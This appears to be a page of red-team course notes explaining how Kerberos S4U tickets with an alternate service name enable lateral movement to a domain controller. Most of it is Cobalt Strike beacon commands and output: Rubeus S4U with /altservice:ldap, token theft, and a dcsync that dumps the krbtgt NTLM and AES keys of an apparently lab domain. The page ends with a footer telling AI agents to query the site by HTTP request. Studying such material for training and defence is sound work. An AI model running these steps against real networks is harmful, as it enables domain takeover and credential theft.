# Alternate Service Name The cifs service can be leveraged for lateral movement, but what if port 445 was unavailable or we wanted an option other then PsExec? It was discovered by [Alberto Solino](https://twitter.com/agsolino) that the service name is [not protected](https://www.secureauth.com/blog/kerberos-delegation-spns-and-more/) in the Kerberos structure, so we can actually request a TGS for any service run by the original account. Since the cifs service is run by the computer account by default, it means we can request a TGS for any other service also run by the computer account. This can be abused using `/altservice` flag in Rubeus. In this example, we're using the same TGT for SQL-2 to request a TGS for LDAP. ``` beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:nlamb /msdsspn:cifs/dc-2.dev.cyberbotic.io /altservice:ldap /user:sql-2$ /ticket:doIFpD[...]MuSU8= /nowrap [*] Action: S4U [*] Building S4U2self request for: 'SQL-2$@DEV.CYBERBOTIC.IO' [*] Using domain controller: dc-2.dev.cyberbotic.io (10.10.122.10) [*] Sending S4U2self request to 10.10.122.10:88 [+] S4U2self success! [*] Got a TGS for 'nlamb' to 'SQL-2$@DEV.CYBERBOTIC.IO' [*] base64(ticket.kirbi): doIFnD[...]FMLTIk [*] Impersonating user 'nlamb' to target SPN 'cifs/dc-2.dev.cyberbotic.io' [*] Final ticket will be for the alternate service 'ldap' [*] Building S4U2proxy request for service: 'cifs/dc-2.dev.cyberbotic.io' [*] Using domain controller: dc-2.dev.cyberbotic.io (10.10.122.10) [*] Sending S4U2proxy request to domain controller 10.10.122.10:88 [+] S4U2proxy success! [*] Substituting alternative service name 'ldap' [*] base64(ticket.kirbi) for SPN 'ldap/dc-2.dev.cyberbotic.io': doIGaD[...]ljLmlv beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIGaD[...]ljLmlv [*] Using DEV\nlamb:FakePass [*] Showing process : False [*] Username : nlamb [*] Domain : DEV [*] Password : FakePass [+] Process : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9 [+] ProcessID : 2580 [+] Ticket successfully imported! [+] LUID : 0x4b328e beacon> steal_token 2580 ``` \\ Against a domain controller, the LDAP service allows us to perform a dcsync. ``` beacon> dcsync dev.cyberbotic.io DEV\krbtgt [DC] 'dev.cyberbotic.io' will be the domain [DC] 'dc-2.dev.cyberbotic.io' will be the DC server [DC] 'DEV\krbtgt' will be the user account [rpc] Service : ldap [rpc] AuthnSvc : GSS_NEGOTIATE (9) Object RDN : krbtgt ** SAM ACCOUNT ** SAM Username : krbtgt Account Type : 30000000 ( USER_OBJECT ) User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT ) Account expiration : Password last change : 8/15/2022 4:01:04 PM Object Security ID : S-1-5-21-569305411-121244042-2357301523-502 Object Relative ID : 502 Credentials: Hash NTLM: 9fb924c244ad44e934c390dc17e02c3d ntlm- 0: 9fb924c244ad44e934c390dc17e02c3d lm - 0: 207d5e08551c51892309c0cf652c353b * Primary:Kerberos-Newer-Keys * Default Salt : DEV.CYBERBOTIC.IOkrbtgt Default Iterations : 4096 Credentials aes256_hmac (4096) : 51d7f328ade26e9f785fd7eee191265ebc87c01a4790a7f38fb52e06563d4e7e aes128_hmac (4096) : 6fb62ed56c7de778ca5e4fe6da6d3aca des_cbc_md5 (4096) : 629189372a372fda ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://yamortsa.gitbook.io/rto/kerberos/alternate-service-name.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.